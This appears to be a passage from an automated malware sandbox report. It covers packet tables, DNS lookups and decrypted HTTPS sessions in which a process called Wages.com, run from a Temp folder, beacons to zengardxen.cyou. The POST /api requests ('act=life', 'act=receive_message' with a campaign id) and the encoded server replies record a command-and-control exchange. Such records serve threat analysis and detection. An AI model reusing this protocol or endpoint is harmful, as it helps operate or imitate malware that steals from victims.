                                    Feb 14, 2025 16:55:55.694904089 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.694919109 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.196563005 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.196790934 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.197979927 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.198009968 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.198867083 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.200859070 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.200859070 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.200987101 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847533941 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847651005 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847723961 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847748995 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.847784042 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847851038 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.847898006 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.847907066 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848038912 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848088980 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.848094940 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848200083 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848253965 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.848259926 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848292112 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.848298073 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848439932 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.848483086 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.848489046 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.897631884 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.897735119 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.897787094 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.897813082 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.897866964 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.897872925 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.898034096 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.898092031 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.898600101 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.898622990 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.898637056 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.898643970 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.959539890 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.959583044 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:56.959688902 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.960014105 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:56.960027933 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:57.459749937 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:57.459844112 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:57.461055040 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:57.461067915 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:57.461407900 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:57.462858915 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:57.463001966 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:57.463036060 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:57.463090897 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:57.463097095 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:58.812232018 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:58.812352896 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:58.812406063 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:58.812511921 CET49739443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:58.812525988 CET44349739188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:58.832370043 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:58.832422018 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:58.832534075 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:58.832864046 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:58.832882881 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.322674990 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.322762012 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.323858023 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.323878050 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.324253082 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.325524092 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.325793028 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.325833082 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.898119926 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.898355007 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.898411036 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.898473978 CET49740443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.898497105 CET44349740188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.984483957 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.984539032 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:59.984621048 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.984903097 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:59.984914064 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:00.447176933 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:00.447277069 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:00.448467016 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:00.448477983 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:00.448976040 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:00.452361107 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:00.452565908 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:00.452595949 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:00.452661037 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:00.452671051 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.199923992 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.200175047 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.200253010 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.200339079 CET49741443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.200359106 CET44349741188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.270073891 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.270137072 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.270230055 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.270509958 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.270540953 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.763402939 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.763539076 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.764940977 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.764970064 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.765312910 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:01.766524076 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.766653061 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:01.766675949 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:02.396785021 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:02.396897078 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:02.396950006 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:02.397088051 CET49742443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:02.397110939 CET44349742188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:02.631853104 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:02.631925106 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:02.632035971 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:02.632365942 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:02.632400036 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.118221998 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.118341923 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.119508028 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.119539022 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.119873047 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.120810032 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121350050 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121397972 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121515036 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121557951 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121676922 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.121834993 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.121978998 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122020006 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122183084 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122225046 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122395039 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122432947 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122452021 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122481108 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122627974 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122673035 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122711897 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122734070 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122821093 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122864962 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.122921944 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.122941971 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:03.123034000 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.123107910 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.123145103 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:03.131129980 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.918935061 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.919050932 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.919239998 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.919488907 CET49743443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.919533014 CET44349743188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.922645092 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.922689915 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:04.922779083 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.923212051 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:04.923223019 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.414225101 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.414361954 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.415713072 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.415724039 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.416613102 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.417987108 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.418010950 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.418135881 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960134029 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960257053 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960434914 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960539103 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960561991 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960580111 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960587025 CET44349744188.114.97.3192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 14, 2025 16:55:21.955965996 CET5713053192.168.2.41.1.1.1
                                    Feb 14, 2025 16:55:21.963825941 CET53571301.1.1.1192.168.2.4
                                    Feb 14, 2025 16:55:54.656527996 CET5118553192.168.2.41.1.1.1
                                    Feb 14, 2025 16:55:54.680768967 CET53511851.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Feb 14, 2025 16:55:21.955965996 CET192.168.2.41.1.1.10x6d9eStandard query (0)jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQA (IP address)IN (0x0001)false
                                    Feb 14, 2025 16:55:54.656527996 CET192.168.2.41.1.1.10xf895Standard query (0)zengardxen.cyouA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Feb 14, 2025 16:55:21.963825941 CET1.1.1.1192.168.2.40x6d9eName error (3)jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQnonenoneA (IP address)IN (0x0001)false
                                    Feb 14, 2025 16:55:54.680768967 CET1.1.1.1192.168.2.40xf895No error (0)zengardxen.cyou188.114.97.3A (IP address)IN (0x0001)false
                                    Feb 14, 2025 16:55:54.680768967 CET1.1.1.1192.168.2.40xf895No error (0)zengardxen.cyou188.114.96.3A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • zengardxen.cyou

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449737188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:55:55 UTC262OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: zengardxen.cyou
                                    2025-02-14 15:55:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2025-02-14 15:55:55 UTC1120INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=1cpucpeinm7oehb3bf26pncufa; expires=Sat, 15 Feb 2025 15:55:55 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XY%2FEv63IkGEtSZxhJBLX0YuJuSseS3Ne2%2FQYLGqTiJHpvzOTTIsIRtLod8P9uu8R1AFUlHXXtRZI2RmsHQWZwQBVe4ZCVIyEZpJkM%2B7re6StIxd5imGr47GUQKeCiWAYHAg%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ec67972d6c8-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7550&min_rtt=7527&rtt_var=2869&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=378630&cwnd=32&unsent_bytes=0&cid=141b543dfb3e0db7&ts=532&x=0"
                                    2025-02-14 15:55:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2025-02-14 15:55:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.449738188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:55:56 UTC263OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 46
                                    Host: zengardxen.cyou
                                    2025-02-14 15:55:56 UTC46OUTData Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 6d 6d 6d 26 6a 3d
                                    Data Ascii: act=receive_message&ver=4.0&lid=WG6I6S--mmm&j=
                                    2025-02-14 15:55:56 UTC1122INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=vmsl4rqdpqj9f3rfa0hplqkhrq; expires=Sat, 15 Feb 2025 15:55:56 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=367C8JnYmyG7FYTyhVlxRML%2FwY6b7xGkqPSk13WhkuAGiQs%2FiV0mBlv%2BUyofx9thUfm6%2FojttBqsRLQmVAIMnSqgCJvZgud5oXPjaJb3xP45yMII4nTTBuIxxFz0bfLPuOs%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3eccdefc82ff-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7317&min_rtt=7271&rtt_var=2759&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=945&delivery_rate=401595&cwnd=32&unsent_bytes=0&cid=a0a71d8a7ecade2e&ts=625&x=0"
                                    2025-02-14 15:55:56 UTC247INData Raw: 31 63 61 37 0d 0a 53 6d 50 4c 57 50 4f 72 41 47 47 56 63 55 6a 6e 56 4b 67 65 66 6d 6f 79 49 68 42 63 41 71 6c 72 67 73 2f 61 59 43 52 76 54 4b 41 78 51 62 31 36 79 5a 38 73 51 2b 59 55 61 74 30 67 32 6d 73 62 52 68 42 44 64 48 34 34 7a 77 72 75 76 4c 39 4d 42 68 6b 68 67 6e 41 46 71 6a 53 41 7a 69 78 44 38 41 6c 71 33 51 2f 54 50 42 73 45 45 42 67 79 4f 57 6a 4c 43 75 36 74 75 77 74 4c 48 79 44 44 49 67 2b 73 4d 4a 62 49 5a 41 44 35 48 43 32 43 4d 63 6c 30 45 41 4e 66 53 6e 31 2b 4c 6f 73 4f 2b 4f 33 67 51 6d 6b 4b 4f 4d 45 48 41 72 67 7a 30 64 59 73 47 72 63 55 4a 73 56 75 69 6e 38 62 43 46 35 45 64 44 64 71 77 51 50 6d 72 4c 34 4b 56 41 59 71 79 43 49 42 72 7a 47 63 77 58 41 4e 38 78 73 6d 68 44 76 4a 50 46 4a 49 56 31 67 79 5a
                                    Data Ascii: 1ca7SmPLWPOrAGGVcUjnVKgefmoyIhBcAqlrgs/aYCRvTKAxQb16yZ8sQ+YUat0g2msbRhBDdH44zwruvL9MBhkhgnAFqjSAzixD8Alq3Q/TPBsEEBgyOWjLCu6tuwtLHyDDIg+sMJbIZAD5HC2CMcl0EANfSn1+LosO+O3gQmkKOMEHArgz0dYsGrcUJsVuin8bCF5EdDdqwQPmrL4KVAYqyCIBrzGcwXAN8xsmhDvJPFJIV1gyZ
                                    2025-02-14 15:55:56 UTC1369INData Raw: 69 43 59 4f 2b 4f 38 71 52 64 4c 48 53 69 43 4e 30 2b 77 65 70 62 46 49 6c 75 33 47 79 61 4c 4d 38 6c 7a 47 77 6c 51 55 6e 30 2b 59 38 4d 42 35 4b 65 33 44 55 6b 44 4a 4d 55 67 43 4b 34 31 6c 73 46 6b 44 50 52 54 5a 4d 55 78 30 6a 78 45 53 48 42 51 63 54 31 30 78 68 69 67 73 76 59 62 42 67 6f 69 67 6e 42 42 72 7a 53 51 78 47 49 52 2f 78 67 68 67 43 54 42 64 52 45 46 55 45 31 34 4d 57 50 4c 44 75 71 6e 74 77 68 43 41 43 50 45 4b 41 48 70 64 4e 48 4f 65 6b 4f 76 55 77 6d 41 4a 73 31 77 43 6b 70 71 41 47 31 77 65 59 73 4f 37 4f 33 67 51 6b 34 49 4c 63 45 6a 44 71 6f 79 6d 74 74 69 45 66 45 65 4c 35 63 77 7a 33 49 57 43 30 4a 4b 66 44 68 6a 77 67 4c 70 71 4c 38 47 42 6b 4e 75 78 54 42 42 38 58 71 77 78 47 6b 50 2f 51 51 71 78 53 6d 45 5a 56 77 50 58 41 41 71
                                    Data Ascii: iCYO+O8qRdLHSiCN0+wepbFIlu3GyaLM8lzGwlQUn0+Y8MB5Ke3DUkDJMUgCK41lsFkDPRTZMUx0jxESHBQcT10xhigsvYbBgoignBBrzSQxGIR/xghgCTBdREFUE14MWPLDuqntwhCACPEKAHpdNHOekOvUwmAJs1wCkpqAG1weYsO7O3gQk4ILcEjDqoymttiEfEeL5cwz3IWC0JKfDhjwgLpqL8GBkNuxTBB8XqwxGkP/QQqxSmEZVwPXAAq
                                    2025-02-14 15:55:56 UTC1369INData Raw: 57 67 34 2f 67 46 58 6b 31 32 67 67 49 43 76 54 6d 62 69 31 63 41 2b 52 30 74 6b 33 62 56 4d 67 56 49 56 30 77 79 5a 69 44 47 43 4f 69 72 71 67 31 4c 44 69 44 4d 4a 77 53 6d 4d 70 48 4a 62 77 62 7a 47 43 47 47 4f 38 35 75 46 67 68 59 52 58 4d 30 61 6f 74 48 6f 4b 71 67 51 68 35 4e 48 39 55 6a 51 35 77 35 6e 38 64 6c 46 62 63 4d 5a 4a 78 32 7a 58 42 63 55 42 42 4e 65 6a 74 6c 78 41 6a 71 6f 37 30 49 53 67 55 67 77 54 6f 4f 72 54 71 64 77 57 67 4f 2b 52 63 69 6a 44 33 42 65 68 77 4a 57 67 41 38 66 6d 66 54 53 62 6a 74 6a 41 56 4b 41 43 47 41 48 51 4b 6e 4e 4a 62 66 49 68 79 35 43 6d 71 43 4f 6f 6f 6b 58 41 52 5a 51 48 6b 30 5a 4d 73 4f 37 61 69 37 42 55 55 41 4b 63 67 6d 42 71 30 32 6d 4d 52 6b 41 2f 41 58 4c 35 63 7a 77 33 41 51 53 42 34 41 64 53 59 67 6b
                                    Data Ascii: Wg4/gFXk12ggICvTmbi1cA+R0tk3bVMgVIV0wyZiDGCOirqg1LDiDMJwSmMpHJbwbzGCGGO85uFghYRXM0aotHoKqgQh5NH9UjQ5w5n8dlFbcMZJx2zXBcUBBNejtlxAjqo70ISgUgwToOrTqdwWgO+RcijD3BehwJWgA8fmfTSbjtjAVKACGAHQKnNJbfIhy5CmqCOookXARZQHk0ZMsO7ai7BUUAKcgmBq02mMRkA/AXL5czw3AQSB4AdSYgk
                                    2025-02-14 15:55:56 UTC1369INData Raw: 30 51 68 35 4e 4a 38 73 36 44 36 63 7a 6e 4d 39 71 42 50 6b 65 49 59 4d 39 7a 58 73 61 42 56 68 4e 64 7a 31 68 7a 77 50 79 72 72 4d 49 53 77 64 75 6a 47 67 47 73 58 72 4a 69 55 55 50 33 67 4d 78 6c 79 43 4b 59 31 49 52 45 45 64 2b 66 6a 69 4c 43 75 2b 6b 74 77 70 4f 41 69 48 47 4a 67 65 76 4e 35 54 47 61 42 48 2f 48 53 65 4f 4f 63 46 75 48 41 56 55 54 48 59 32 61 38 46 4a 72 75 32 2f 47 67 5a 56 62 76 63 6c 44 71 6b 35 68 34 6c 39 54 65 35 54 4c 59 6c 32 6b 6a 77 51 42 6c 42 50 66 6a 4a 72 77 77 6a 73 6f 37 38 48 54 77 55 6d 30 43 6b 46 6f 54 75 66 78 6d 4d 48 38 68 59 75 67 6a 4c 4d 63 31 78 47 45 45 64 71 66 6a 69 4c 4a 73 65 59 2b 69 4e 38 54 54 47 4d 4d 55 47 75 4e 74 47 52 49 67 2f 30 48 79 4b 4b 4d 4d 4e 77 46 67 46 62 54 48 6b 36 62 4d 49 4d 35 71
                                    Data Ascii: 0Qh5NJ8s6D6cznM9qBPkeIYM9zXsaBVhNdz1hzwPyrrMISwdujGgGsXrJiUUP3gMxlyCKY1IREEd+fjiLCu+ktwpOAiHGJgevN5TGaBH/HSeOOcFuHAVUTHY2a8FJru2/GgZVbvclDqk5h4l9Te5TLYl2kjwQBlBPfjJrwwjso78HTwUm0CkFoTufxmMH8hYugjLMc1xGEEdqfjiLJseY+iN8TTGMMUGuNtGRIg/0HyKKMMNwFgFbTHk6bMIM5q
